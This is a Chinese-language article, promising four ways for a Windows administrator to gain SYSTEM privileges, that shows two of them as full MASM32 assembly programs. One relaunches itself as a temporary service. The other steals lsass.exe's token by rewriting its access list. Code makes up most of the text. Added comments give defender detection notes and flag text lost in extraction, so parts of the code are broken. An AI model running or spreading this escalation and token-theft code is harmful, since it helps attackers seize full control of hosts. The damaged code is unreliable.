
从管理员身份获得SYSTEM-权限的四种方法

1. 以服务方式运行。因为以服务方式运行程序时，相当于运行程序的是系统进程，所以被指定运行的程序自然而然地继承了系统进程的权限，也就是 SYSTEM 权限。

;@echo off
;goto make
;=====================================================================
; Run a program with SYSTEM privileges - GetSys1
; Method: re-launch this executable as a Windows service
;
; This file is a self-assembling batch file: cmd.exe treats the leading
; ';' as a separator and jumps to :make, which assembles and links the
; same file with masm32; MASM treats the ';' lines as comments and stops
; at 'end start', so the batch tail is never assembled.
;
; Flow (see prose below): instance A creates a mutex and, finding it new,
; registers itself as a temporary service and starts it. Instance B (the
; service process, running as SYSTEM) finds the mutex already present
; and spawns regedit.exe, which inherits B's token.
;
; Defender note: even though the service is deleted immediately, the
; service-install itself is logged by the SCM (System log event 7045 /
; Security event 4697 where service auditing is enabled), so a transient
; "GetSys1Temp" service is a detectable artifact.
;=====================================================================
.386
.model flat, stdcall
option casemap :none
include c:\masm32\include\windows.inc
include c:\masm32\include\kernel32.inc
include c:\masm32\include\advapi32.inc
include c:\masm32\include\masm32.inc
includelib c:\masm32\lib\kernel32.lib
includelib c:\masm32\lib\advapi32.lib
includelib c:\masm32\lib\masm32.lib

_ReLaunch proto

; CTXT: place a NUL-terminated literal in .const and yield its address.
; NOTE(review): the 'exitm' below has no return expression on this page;
; the masm32 macro normally ends with 'exitm <offset lbl>' and the angle-
; bracketed part was probably lost in extraction — confirm against masm32.
CTXT MACRO text
    local lbl
    .const
    lbl db text,0
    .code
    exitm
ENDM

.code
;-----------------------------------------------------------------------
; start - program entry point (no arguments)
; Branches on whether "GetSys1_Mutex" already existed:
;   ERROR_ALREADY_EXISTS -> we are the service-launched instance (B):
;                            spawn regedit.exe and exit.
;   otherwise            -> we are the first instance (A): _ReLaunch.
; The mutex handle is never closed; process exit releases it.
;-----------------------------------------------------------------------
start proc
    LOCAL stStartupInfo : STARTUPINFO
    LOCAL procinfo : PROCESS_INFORMATION

    invoke CreateMutex, NULL, TRUE, CTXT("GetSys1_Mutex")
    invoke GetLastError                 ; eax = last error, tested below
    .if eax==ERROR_ALREADY_EXISTS
        invoke RtlZeroMemory, addr stStartupInfo, sizeof stStartupInfo
        mov stStartupInfo.cb, sizeof stStartupInfo
        ; The child inherits this process's token (SYSTEM when run by SCM).
        ; The return value is not checked: if CreateProcess fails,
        ; procinfo is uninitialised and the CloseHandle calls below
        ; operate on stack garbage.
        invoke CreateProcess, 0, CTXT("regedit.exe"), 0, 0, 0, 0, 0, 0, addr stStartupInfo, addr procinfo
        invoke CloseHandle, procinfo.hProcess
        invoke CloseHandle, procinfo.hThread
    .else
        invoke _ReLaunch
    .endif
    invoke ExitProcess, NULL
start endp

;-----------------------------------------------------------------------
; _ReLaunch - register this executable as a temporary service and start it
; In:    nothing
; Out:   nothing (eax undefined); all failures are silently skipped
; Uses:  SCM handle hSCManager, service handle hService, szName = own path
; Steps: delete any stale "GetSys1Temp" service, CreateService with this
;        module's path, StartService, DeleteService, close handles.
; NOTE: the service instance never calls StartServiceCtrlDispatcher, so
;       StartService presumably returns only after the SCM gives up on the
;       service (the prose below says it returns after B has finished).
; NOTE: szName is passed to CreateService unquoted; if the module path
;       contains spaces the SCM may resolve a different executable
;       (classic unquoted service path) — confirm the deployment path.
;-----------------------------------------------------------------------
_ReLaunch proc
    LOCAL hSCManager
    LOCAL hService
    LOCAL szName[MAX_PATH] : byte

    invoke OpenSCManager, NULL, NULL, SC_MANAGER_CREATE_SERVICE
    .if eax!=0
        mov hSCManager, eax
        ; Remove a leftover service from a previous aborted run.
        invoke OpenService, hSCManager, CTXT("GetSys1Temp"), DELETE
        .if eax!=0
            push eax                    ; stash handle as the argument for CloseServiceHandle
            invoke DeleteService, eax
            call CloseServiceHandle     ; consumes the pushed handle (stdcall callee cleans up)
        .endif
        invoke GetModuleFileName, NULL, addr szName, MAX_PATH
        ; Own-process, interactive, demand-start service whose image is this file.
        invoke CreateService, hSCManager, CTXT("GetSys1Temp"), CTXT("GetSys1 Temp Service"), \
            SERVICE_START + SERVICE_QUERY_STATUS + DELETE, \
            SERVICE_WIN32_OWN_PROCESS + SERVICE_INTERACTIVE_PROCESS, SERVICE_DEMAND_START, \
            SERVICE_ERROR_IGNORE, addr szName, NULL, NULL, NULL, NULL, NULL
        .if eax!=0
            mov hService, eax
            invoke StartService, hService, 0, NULL
            invoke DeleteService, hService  ; marked for deletion once all handles close
            invoke CloseServiceHandle, hService
        .endif
        invoke CloseServiceHandle, hSCManager
    .endif
    ret
_ReLaunch endp

end start

:make
rem Batch tail: assemble and link this very file with masm32.
set path=%path%;c:\masm32\bin
set appname=GetSys1
ml /nologo /c /coff %appname%.bat
link /nologo /subsystem:windows %appname%.obj
del %appname%.obj
echo.
pause

GetSys1(第一次运行的这个进程GetSys1 我们称为A)开始运行时先创建一个互斥量,接着以服务的方式重新启动自己(又一次运行的进程GetSys1 我们称为B),重新运行后的 B 已经具有了SYSTEM 权限。

B 再通过CreateProcess 函数运行regedit.exe 程序,因为B 具有SYSTEM 权限,所以regedit.exe 从中继承了SYSTEM 权限。

运行完了regedit.exe 后B 结束运行,然后A 中的StartService 函数返回,A 结束运行。

正是因为 StartService 函数不会直接返回，所以不能够直接通过服务的方式运行 regedit.exe，而要由服务进程再去启动它。

2. 添加 ACL 的方法。主要思想是调用 CreateProcessAsUser 函数来运行程序，CreateProcessAsUser 函数的第一个参数是特定用户的令牌，把这个参数设为具有 SYSTEM 权限的令牌即可。

;@echo off
;goto make
;=====================================================================
; Run a program with SYSTEM privileges - GetSys2
; Method: add an ACE to the DACL of lsass.exe's primary token
;
; Self-assembling batch file, same layout as GetSys1: cmd.exe jumps to
; :make and builds the file with masm32; MASM stops at 'end start'.
;
; Flow: enable SeDebugPrivilege, find lsass.exe, open its token with
; READ_CONTROL|WRITE_DAC, grant the current user TOKEN_ALL_ACCESS on
; that token (_ModifySecurity), reopen the token with full access,
; duplicate it as a primary token, and CreateProcessAsUser regedit.exe.
;
; Defender note: this requires an administrator with SeDebugPrivilege;
; the handle to lsass.exe and the DACL change on its token are the
; observable events (process-access auditing on lsass, token object
; access auditing).
;=====================================================================
.386
.model flat, stdcall
option casemap :none
include c:\masm32\include\windows.inc
include c:\masm32\include\kernel32.inc
include c:\masm32\include\advapi32.inc
include c:\masm32\include\accctrl.inc
include c:\masm32\include\masm32.inc
includelib c:\masm32\lib\kernel32.lib
includelib c:\masm32\lib\advapi32.lib
includelib c:\masm32\lib\masm32.lib

; NOTE(review): the parameter types below read 'WORD' on this page while
; every proc is declared with DWORD parameters; the ':D' of ':DWORD' was
; probably lost in extraction — confirm before assembling.
_EnablePrivilege proto WORD,WORD
_GetPidFromProcName proto WORD
_ModifySecurity proto WORD,WORD

; CTXT: place a NUL-terminated literal in .const and yield its address.
; NOTE(review): 'exitm' has no return expression here; masm32's macro
; uses 'exitm <offset lbl>' and the bracketed part was probably lost in
; extraction — confirm.
CTXT MACRO text
    local lbl
    .const
    lbl db text,0
    .code
    exitm
ENDM

; ACL header layout (8 bytes), declared locally — presumably because the
; included headers do not define it; confirm it does not clash with
; windows.inc.
ACL STRUCT
    AclRevision BYTE ?
    Sbz1 BYTE ?
    AclSize WORD ?
    AceCount WORD ?
    Sbz2 WORD ?
ACL ENDS
PACL typedef PTR ACL

; SECURITY_IMPERSONATION_LEVEL value passed to DuplicateTokenEx.
SecurityImpersonation equ 2

.code
;-----------------------------------------------------------------------
; start - program entry point (no arguments)
; Locals hProc/hToken/hNewToken are zeroed first so the _exit path can
; close only the handles that were actually opened. Every API failure
; jumps to _exit; nothing is reported to the user.
;-----------------------------------------------------------------------
start proc
    LOCAL hProc
    LOCAL hToken, hNewToken
    LOCAL stStartupInfo : STARTUPINFO
    LOCAL procinfo : PROCESS_INFORMATION

    sub eax, eax                        ; eax = 0 for the handle locals below
    mov hProc, eax
    mov hToken, eax
    mov hNewToken, eax
    invoke RtlZeroMemory, addr stStartupInfo, sizeof stStartupInfo
    invoke RtlZeroMemory, addr procinfo, sizeof procinfo

    ; SeDebugPrivilege is needed to open lsass.exe; the result is not checked.
    invoke _EnablePrivilege, CTXT("SeDebugPrivilege"), TRUE
    invoke _GetPidFromProcName, CTXT("lsass.exe")
    invoke OpenProcess, PROCESS_QUERY_INFORMATION, 0, eax   ; eax = pid (0 if not found)
    test eax, eax
    jz _exit
    mov hProc, eax

    ; Phase 1: open the token only for DACL editing and grant ourselves full access.
    invoke OpenProcessToken, hProc, READ_CONTROL+WRITE_DAC, addr hToken
    test eax, eax
    jz _exit
    invoke _ModifySecurity, hToken, TOKEN_ALL_ACCESS
    test eax, eax
    jz _exit
    invoke CloseHandle, hToken
    mov hToken, 0

    ; Phase 2: reopen with full access (now permitted by the new ACE),
    ; duplicate as a primary token, and use it for the child process.
    invoke OpenProcessToken, hProc, TOKEN_ALL_ACCESS, addr hToken
    test eax, eax
    jz _exit
    invoke DuplicateTokenEx, hToken, TOKEN_ALL_ACCESS, 0, SecurityImpersonation, TokenPrimary, addr hNewToken
    test eax, eax
    jz _exit
    invoke ImpersonateLoggedOnUser, hNewToken
    test eax, eax
    jz _exit
    mov stStartupInfo.cb, sizeof stStartupInfo
    invoke CreateProcessAsUser, hNewToken, 0, CTXT("regedit.exe"), 0, 0, 0, 0, 0, 0, addr stStartupInfo, addr procinfo
    test eax, eax
    jz _exit
    invoke CloseHandle, procinfo.hProcess
    invoke CloseHandle, procinfo.hThread

_exit:
    ; Cleanup: close whichever handles were opened (locals are 0 otherwise).
    .if hProc
        invoke CloseHandle, hProc
    .endif
    .if hToken
        invoke CloseHandle, hToken
    .endif
    .if hNewToken
        invoke CloseHandle, hNewToken
    .endif
    invoke ExitProcess, NULL
start endp

;-----------------------------------------------------------------------
; _ModifySecurity - grant the current user dwAccess on a kernel object
; In:    hToken   = handle opened with READ_CONTROL|WRITE_DAC
;        dwAccess = access mask to grant (caller passes TOKEN_ALL_ACCESS)
; Out:   eax = 1 on success, 0 on any failure
; Steps: read the object's self-relative SD (size query, then fill),
;        build an EXPLICIT_ACCESS for the current user name, merge it into
;        the existing DACL with SetEntriesInAcl, convert the SD to absolute
;        form (size query, then fill), attach the new DACL, write it back.
; All heap blocks are tracked in locals zeroed up front and released at
; _exit, so early failure exits leak nothing.
;-----------------------------------------------------------------------
_ModifySecurity proc uses ebx esi edi, hToken:DWORD, dwAccess:DWORD
    LOCAL pSD, pAbsSD
    LOCAL dwSDLength
    LOCAL bDaclPresent, bDaclDefaulted
    LOCAL pAcl : PACL
    LOCAL pNewAcl : PACL
    LOCAL szName[1024] : BYTE
    LOCAL ea : EXPLICIT_ACCESS
    LOCAL pSacl, pOwner, pPrimaryGroup
    LOCAL dwAclSize, dwSaclSize, dwOwnerSize, dwPrimaryGroup
    LOCAL bSuccess

    sub eax, eax                        ; zero every pointer/size local
    mov pSD, eax
    mov pAbsSD, eax
    mov dwSDLength, eax
    mov bDaclPresent, eax
    mov bDaclDefaulted, eax
    mov pAcl, eax
    mov pNewAcl, eax
    mov pSacl, eax
    mov pOwner, eax
    mov pPrimaryGroup, eax
    mov dwAclSize, eax
    mov dwSaclSize, eax
    mov dwOwnerSize, eax
    mov dwPrimaryGroup, eax
    mov bSuccess, eax

    ; Size query (pSD = NULL, length 0) fills dwSDLength; then the real read.
    invoke GetKernelObjectSecurity, hToken, DACL_SECURITY_INFORMATION, pSD, 0, addr dwSDLength
    invoke LocalAlloc, LPTR, dwSDLength
    test eax, eax
    jz _exit
    mov pSD, eax
    invoke GetKernelObjectSecurity, hToken, DACL_SECURITY_INFORMATION, pSD, dwSDLength, addr dwSDLength
    ; pAcl points INTO the pSD buffer (self-relative SD), not to a separate block.
    invoke GetSecurityDescriptorDacl, pSD, addr bDaclPresent, addr pAcl, addr bDaclDefaulted

    ; GetUserName needs an in/out size DWORD: push sizeof szName and pass
    ; its stack address (esp) as the second argument, then pop it away.
    mov eax, sizeof szName
    push eax
    invoke GetUserName, addr szName, esp
    pop eax

    invoke BuildExplicitAccessWithName, addr ea, addr szName, dwAccess, GRANT_ACCESS, FALSE
    invoke SetEntriesInAcl, 1, addr ea, pAcl, addr pNewAcl   ; pNewAcl = LocalAlloc'd merged DACL
    cmp eax, ERROR_SUCCESS
    jne _exit
    ; NOTE(review): LocalFree on pAcl looks wrong — pAcl is an interior
    ; pointer into pSD (see GetSecurityDescriptorDacl above), not its own
    ; LocalAlloc block; the call presumably fails harmlessly. Confirm.
    invoke LocalFree, pAcl
    mov pAcl, 0

    ; Size query for the absolute SD components (all buffers NULL, sizes 0) ...
    invoke MakeAbsoluteSD, pSD, pAbsSD, addr dwSDLength, pAcl, addr dwAclSize, pSacl, addr dwSaclSize, \
        pOwner, addr dwOwnerSize, pPrimaryGroup, addr dwPrimaryGroup
    invoke LocalAlloc, LPTR, dwSDLength
    test eax, eax
    jz _exit
    mov pAbsSD, eax
    invoke LocalAlloc, LPTR, dwAclSize
    test eax, eax
    jz _exit
    mov pAcl, eax
    invoke LocalAlloc, LPTR, dwSaclSize
    test eax, eax
    jz _exit
    mov pSacl, eax
    invoke LocalAlloc, LPTR, dwOwnerSize
    test eax, eax
    jz _exit
    mov pOwner, eax
    invoke LocalAlloc, LPTR, dwPrimaryGroup
    test eax, eax
    jz _exit
    mov pPrimaryGroup, eax
    ; ... then the real conversion into the freshly allocated buffers.
    invoke MakeAbsoluteSD, pSD, pAbsSD, addr dwSDLength, pAcl, addr dwAclSize, pSacl, addr dwSaclSize, \
        pOwner, addr dwOwnerSize, pPrimaryGroup, addr dwPrimaryGroup

    ; Swap in the merged DACL and write the descriptor back to the object.
    ; Neither return value is checked; bSuccess is set regardless.
    invoke SetSecurityDescriptorDacl, pAbsSD, bDaclPresent, pNewAcl, bDaclDefaulted
    invoke SetKernelObjectSecurity, hToken, DACL_SECURITY_INFORMATION, pAbsSD
    mov bSuccess, 1

_exit:
    ; Release every block that was allocated (locals still 0 were never allocated).
    .if pSD
        invoke LocalFree, pSD
    .endif
    .if pAcl
        invoke LocalFree, pAcl
    .endif
    .if pNewAcl
        invoke LocalFree, pNewAcl
    .endif
    .if pAbsSD
        invoke LocalFree, pAbsSD
    .endif
    .if pSacl
        invoke LocalFree, pSacl
    .endif
    .if pOwner
        invoke LocalFree, pOwner
    .endif
    .if pPrimaryGroup
        invoke LocalFree, pPrimaryGroup
    .endif
    mov eax, bSuccess
    ret
_ModifySecurity endp

;-----------------------------------------------------------------------
; _EnablePrivilege - enable or disable one privilege on the current process token
; In:    szPriv = privilege name string (e.g. "SeDebugPrivilege")
;        bFlags = nonzero to enable (SE_PRIVILEGE_ENABLED), zero to disable
; Out:   eax = return value of AdjustTokenPrivileges
; NOTE:  AdjustTokenPrivileges returns nonzero even when the privilege
;        was not assigned (GetLastError = ERROR_NOT_ALL_ASSIGNED), so the
;        returned value does not prove the privilege is now held.
;-----------------------------------------------------------------------
_EnablePrivilege proc szPriv:DWORD, bFlags:DWORD
    LOCAL hToken
    LOCAL tkp : TOKEN_PRIVILEGES

    invoke GetCurrentProcess
    mov edx, eax                        ; keep pseudo-handle in edx; 'addr' below clobbers eax only
    invoke OpenProcessToken, edx, TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, addr hToken
    invoke LookupPrivilegeValue, NULL, szPriv, addr tkp.Privileges.Luid
    mov tkp.PrivilegeCount, 1
    xor eax, eax
    .if bFlags
        mov eax, SE_PRIVILEGE_ENABLED
    .endif
    mov tkp.Privileges.Attributes, eax
    invoke AdjustTokenPrivileges, hToken, FALSE, addr tkp, 0, 0, 0
    push eax                            ; preserve the result across CloseHandle
    invoke CloseHandle, hToken
    pop eax
    ret
_EnablePrivilege endp

;-----------------------------------------------------------------------
; _GetPidFromProcName - find a process id by executable name
; In:    lpProcName = NUL-terminated image name, compared case-insensitively
; Out:   eax = th32ProcessID of the first match, or 0 if none
; Walks a Toolhelp process snapshot; the snapshot handle is always closed.
; The CreateToolhelp32Snapshot result is not checked before use.
;-----------------------------------------------------------------------
_GetPidFromProcName proc lpProcName:DWORD
    LOCAL stProcess : PROCESSENTRY32
    LOCAL hSnapshot
    LOCAL dwProcessID

    mov dwProcessID, 0
    invoke RtlZeroMemory, addr stProcess, sizeof stProcess
    mov stProcess.dwSize, sizeof stProcess  ; required before Process32First
    invoke CreateToolhelp32Snapshot, TH32CS_SNAPPROCESS, 0
    mov hSnapshot, eax
    invoke Process32First, hSnapshot, addr stProcess
    .while eax                          ; eax = BOOL from Process32First/Next
        invoke lstrcmpi, lpProcName, addr stProcess.szExeFile
        .if eax==0                      ; names equal
            mov eax, stProcess.th32ProcessID
            mov dwProcessID, eax
            .break
        .endif
        invoke Process32Next, hSnapshot, addr stProcess
    .endw
    invoke CloseHandle, hSnapshot
    mov eax, dwProcessID
    ret
_GetPidFromProcName endp

end start

:make
rem Batch tail: assemble and link this very file with masm32.
set path=%path%;c:\masm32\bin
set appname=GetSys2
ml /nologo /c /coff %appname%.bat
link /nologo /subsystem:windows %appname%.obj
del %appname%.obj
echo.
pause

GetSys2 取得lsass.exe 进程的令牌,缺省情况下操作这个令牌的权限很小,所以需要先取得操作这个令牌的所有权限。
